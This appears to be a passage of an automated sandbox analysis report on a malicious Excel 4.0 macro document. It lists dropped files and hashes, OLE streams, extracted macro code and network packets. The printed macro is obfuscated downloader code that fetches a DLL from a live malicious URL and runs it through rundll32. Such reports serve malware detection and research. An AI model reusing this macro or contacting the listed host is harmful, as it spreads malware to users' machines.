                SecuriteInfo.com.Heur.19090.xls | malicious
                SecuriteInfo.com.Heur.4923.xls | malicious
                SecuriteInfo.com.Heur.4923.xls | malicious

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:downloaded
                                Size (bytes):688241
                                Entropy (8bit):7.064532901692121
                                Encrypted:false
                                SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                                MD5:7DF0611CD75FA4C02B29070728C37247
                                SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                                SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                                SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                                Malicious:true
                                Antivirus:
                                 • Antivirus: Virustotal, Detection: 22%
                                 • Antivirus: Metadefender, Detection: 5%
                                 • Antivirus: ReversingLabs, Detection: 2%
                                 Joe Sandbox View:
                                 • Filename: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, Detection: malicious
                                 • Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious
                                 • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious
                                 • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious
                                Reputation:low
                                IE Cache URL:http://revolet-sa.com/files/countryyelow.php
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\FDCE0000
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):67965
                                Entropy (8bit):7.8795190850591
                                Encrypted:false
                                SSDEEP:1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70f:LqeRrW2JyW32AiHD2sTU2yF70f
                                MD5:ACD684D03FB00D3EDE4EF36D090E2892
                                SHA1:98C38FA7130CE3ADF7656D7C9E1410051C7DF775
                                SHA-256:007AD2692E7E4E40D9D9AACF2F68D1B7956DF881C8D0AF2B41569950BF2CA4ED
                                SHA-512:BFE2AD8D06CFCD31845728428CFF7F89748B8CF4A172872D0C85ACBE912A53858A3A90FB180EEDA81294821C029B1413DA9397F814889C2074368EDA35727EB8
                                Malicious:false
                                Reputation:low
                                Preview: .U[O.0.~........&M......i.....o....~..2......\l....xy.)Y<....U.R.f.........;)|..A..5.'.../...E_D..5iC.?(..E..2.u.i.S..[S.l.k...7...C...Y-...G......X.&..n]...P....(.U3...43.q(......A...O..e)..UD.5.....PH3os...q?..8.....nA......1..0Ir.|..CY..1T..3...$.9........4...|..i........V.:....R..<.#..kd...=W.....e..}U.Q...~./qC........L3..>l%.#..).tJ....Wp.M~.....>...d....{O4..@..6......{H?..;g......^:xB.6......>.!......uFL..G>.M.........PK..........!..r.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                Process:C:\Windows\SysWOW64\rundll32.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2178
                                Entropy (8bit):6.992231725533755
                                Encrypted:false
                                SSDEEP:24:NKf5b6UkxAB8LRnbAwdZhE8/mHeYKf5b6UKjqA6YYUWG538Mhh5FB5tFId4UcP0z:Kb6UH8Ltk1Mm+Bb6UFAH6mBFBS4UcLuj
                                MD5:A9C113D8B90FCF3F0B90699048A6D136
                                SHA1:D3764B8EA6F98EE7B6768F32F9AC504B8F5397B5
                                SHA-256:239AD9A1493D03A978E94CE064598C68D4F82056886C0D403477B63317260AC9
                                SHA-512:FDFFE41FE43B9A4789053909A610C4AAE1F974E6D818D5D685D2CAA99BEE15F949089A25F4AB416381784F3B4625F145C99CA051188BB79593DAF8C9BBDAEB53
                                Malicious:false
                                Reputation:low
                                Preview: ........................................user.....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O...........gDJ....@.......,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ...[V.;....{C.+...h.P4.....B...r.............. .....(.U.!...].#HV.y.Z.i.i$..r'./....wN...!.......x.-....m.`....Fh..O.4..f.?.@'(n.p-.7..yV..1jBW....;...IZ......i..o}P....... e..Z....."....y*..>%.8r.msd.>.j.>...?bU..W...a0+.P5....*..\."..l.,>..t.....Z....\...I.2.....Nu.s.0......Il...2....P.....1....:..j..Pb.tQ.4....H..,.JV..z.[n.(#]=. vey.UP....V._..346...T.... w.((k...<..X......`N....6z....v....s}..!..L;.k.....~Z..Z..!p[A..7O..i..e.H.[>C.uE....:{.2..m.@...xG.T...Si_...s...H..`.xm.08........)t..S.........r..=.=)...ot............z..O...........gDJ....@...........E.x.p.o.r.t. .F.l.a.g....f...... ....l....\\...e...D.J..V.d.....a............ .....\l.S..
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 11:53:38 2021, atime=Wed Apr 7 11:53:38 2021, length=8192, window=hide
                                Category:dropped
                                Size (bytes):867
                                Entropy (8bit):4.475918729490231
                                Encrypted:false
                                SSDEEP:12:85QZ+cLgXg/XAlCPCHaXtB8XzB/RUvX+WnicvbwbDtZ3YilMMEpxRljKlcTdJP9O:85A+K/XTd6j0YegDv3qfrNru/
                                MD5:44C685D9F27C5D4389C82A76E63BE69C
                                SHA1:29408FEA1972853446414948D64054ECBCBA3D0E
                                SHA-256:BA1D65408DD9BA2B20995E2A49F823D7F4F968CA65B8D477F0531A9744881509
                                SHA-512:9298E13DC3CA5BAF93E20E631B1E903EDAE998891D1A9DB58BA96CE9F08032593E6EB03F01860477AC9B84CC0267770F42E07868E0E3439DD0BC2925A6F20CBE
                                Malicious:false
                                Reputation:low
                                Preview: L..................F...........7G..e2B..+..e2B..+... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.f..Desktop.d......QK.X.R.f*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Trojan.Agent.FFFK.8079.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 7 11:53:25 2021, mtime=Wed Apr 7 11:53:38 2021, atime=Wed Apr 7 11:53:38 2021, length=92160, window=hide
                                Category:dropped
                                Size (bytes):2318
                                Entropy (8bit):4.573810904271115
                                Encrypted:false
                                SSDEEP:48:8T/XT0jtH+NAHNfQh2T/XT0jtH+NAHNfQ/:8T/XojtcmfQh2T/XojtcmfQ/
                                MD5:7A6712A397C39A608B402FB08F51D055
                                SHA1:708B6D4ACCF27C74C2E2A541B14B95FC32FCF065
                                SHA-256:1CF0635DFA3533DBB3CA1CE8B5A5C80FDA4E0C2038049B36F1554FA851B12BD9
                                SHA-512:872C25D4E8D9FC1A7D020E2D379BA9C08B13C3ACAA49CC5A18C8E2DD1C4F21B572CA330D84BDF34A6AE4E4401A56A7CBF7609BF8F0C0B49527C0C2B531478730
                                Malicious:false
                                Reputation:low
                                Preview: L..................F.... ...H....+..e2B..+..g=U..+...h...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.f..Desktop.d......QK.X.R.f*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.f .SECURI~1.XLS.........R.f.R.f*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...A.g.e.n.t...F.F.F.K...8.0.7.9...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls.B.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...T.r.o.j.a.n...A.g.e.n.t...F.F.F.K...8.0.7.9...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):170
                                Entropy (8bit):4.888657403242958
                                Encrypted:false
                                SSDEEP:3:oyBVomM0b3kVsLBVouscb3kVsLBVomM0b3kVsLBVov:dj60gVsLBVVgVsLBV60gVsLBVy
                                MD5:77A0BBADB3E68BC0A632C215D9A38372
                                SHA1:D2F8B90CBAFB167744DF998488137E83FADB51F4
                                SHA-256:999982418F347FD2A25818225C5B61106CA2B8C16F3558C45251E4C228E75C9D
                                SHA-512:C32CCAA1D4E1E47813CEACD4F25C158A004917AD4B315AFB24CCD79A37A5E0E4A966560F36432B47184ADF869F86854E8C3A95F1F3FD1085B2EB1BBD953EAABF
                                Malicious:false
                                Reputation:low
                                Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Trojan.Agent.FFFK.8079.LNK=0..SecuriteInfo.com.Trojan.Agent.FFFK.8079.LNK=0..[xls]..SecuriteInfo.com.Trojan.Agent.FFFK.8079.LNK=0..
                                C:\Users\user\Desktop\BECE0000
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Applesoft BASIC program data, first line number 16
                                Category:dropped
                                Size (bytes):127008
                                Entropy (8bit):7.230390922283029
                                Encrypted:false
                                SSDEEP:3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSi2jTUqyF70Si2W2vXmwgvXmw3I8rmjo:G8rmjAItyzElBIL6lECbgBvP5NmuCShR
                                MD5:435860799AF28567EABD1AEC443E69B0
                                SHA1:D6950FED25AB8CEC5E1DAA1AF55F82CF1A6EBD58
                                SHA-256:54CBCFCA263513798A7D7C63CCFDAD67CDB987B966E6CFB22F26212AEDFFC814
                                SHA-512:9EA1B2DF35800E7B24DC09D18E2F91D9760641812FDBD72310F071503C2DA1F5B5F859315F3EA4B4BE06D9CBAFC77B3A7EB1E3AB0E9B6042FCD5D1D462332774
                                Malicious:false
                                Reputation:low
                                Preview: ........g2..........................\.p....user B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.........
                                C:\Users\user\sdbybsd.fds
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):688241
                                Entropy (8bit):7.064532901692121
                                Encrypted:false
                                SSDEEP:12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx
                                MD5:7DF0611CD75FA4C02B29070728C37247
                                SHA1:1095F8922D93458EFBC97612D8A5DEA8DB8325A5
                                SHA-256:AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
                                SHA-512:167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59
                                Malicious:true
                                Antivirus:
                                 • Antivirus: Metadefender, Detection: 5%
                                 • Antivirus: ReversingLabs, Detection: 2%
                                 Joe Sandbox View:
                                 • Filename: SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls, Detection: malicious
                                 • Filename: SecuriteInfo.com.Heur.19090.xls, Detection: malicious
                                 • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious
                                 • Filename: SecuriteInfo.com.Heur.4923.xls, Detection: malicious
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.N.............1...............1..........i/..92......R1..!...R1..+....(......R1......Rich............................PE..L....Kl`...........!.........@......>8..............................................................................@a..S............@.......................`..d^...................................................................................text...6u.......................... ..`.rdata..............................@..@.data........p...@...p..............@....idata...1.......@..................@....rsrc........@... ..................@..@.reloc...e...`...p..................@..B........................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Apr 6 15:04:37 2021, Security: 0
                                Entropy (8bit):3.087349849990019
                                TrID:
                                • Microsoft Excel sheet (30009/1) 78.94%
                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                File name:SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls
                                File size:267776
                                MD5:a7c64329efaea29a2dc97ced238490f7
                                SHA1:5d4b9b386354444cf74fd858e3409f0294c45330
                                SHA256:8ee305eec94aaef24116983ceef933359fb860ab50787b7963c3f46fe751630c
                                SHA512:f7be46dad7af7216a65c5a58766eb20a2e847a787ddb19f9b6520d7e5c81836c8382911743ab13ad171145aadddaa1a43a05c93c5ba3b287d862cf3045bc1dbf
                                SSDEEP:6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0+:Fh+
                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                File Icon

                                Icon Hash:e4eea286a4b4bcb4

                                Static OLE Info

                                General

                                Document Type:OLE
                                Number of OLE Files:1

                                OLE File "SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls"

                                Indicators

                                Has Summary Info:True
                                Application Name:Microsoft Excel
                                Encrypted Document:False
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:True

                                Summary

                                Code Page:1251
                                Last Saved By:5
                                Create Time:2006-09-16 00:00:00
                                Last Saved Time:2021-04-06 14:04:37
                                Creating Application:Microsoft Excel
                                Security:0

                                Document Summary

                                Document Code Page:1251
                                Thumbnail Scaling Desired:False
                                Contains Dirty Links:False

                                Streams

                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                File Type:data
                                Stream Size:4096
                                Entropy:0.348065102689
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00
                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                General
                                Stream Path:\x5SummaryInformation
                                File Type:data
                                Stream Size:4096
                                Entropy:0.24280443857
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780
                                General
                                Stream Path:Book
                                File Type:Applesoft BASIC program data, first line number 8
                                Stream Size:255780
                                Entropy:3.03349063455
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                                Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                Macro 4.0 Code

                                ,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
                                ,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
                                =HALT()

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Apr 7, 2021 05:54:07.267561913 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.429316044 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.429465055 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.430265903 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.591984034 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.883936882 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.883990049 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884031057 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884072065 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884110928 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884160995 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884180069 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.884197950 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884208918 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.884212017 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.884239912 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884244919 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.884279966 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884288073 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.884320021 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:07.884332895 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.884402037 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:07.893683910 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.045336962 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045422077 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045439959 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045598984 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045603991 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.045627117 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045644045 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045715094 CEST | 49167 | 80 | 192.168.2.22 | 192.232.249.186
                                Apr 7, 2021 05:54:08.045787096 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045804024 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045819998 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045836926 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
                                Apr 7, 2021 05:54:08.045852900 CEST | 80 | 49167 | 192.232.249.186 | 192.168.2.22
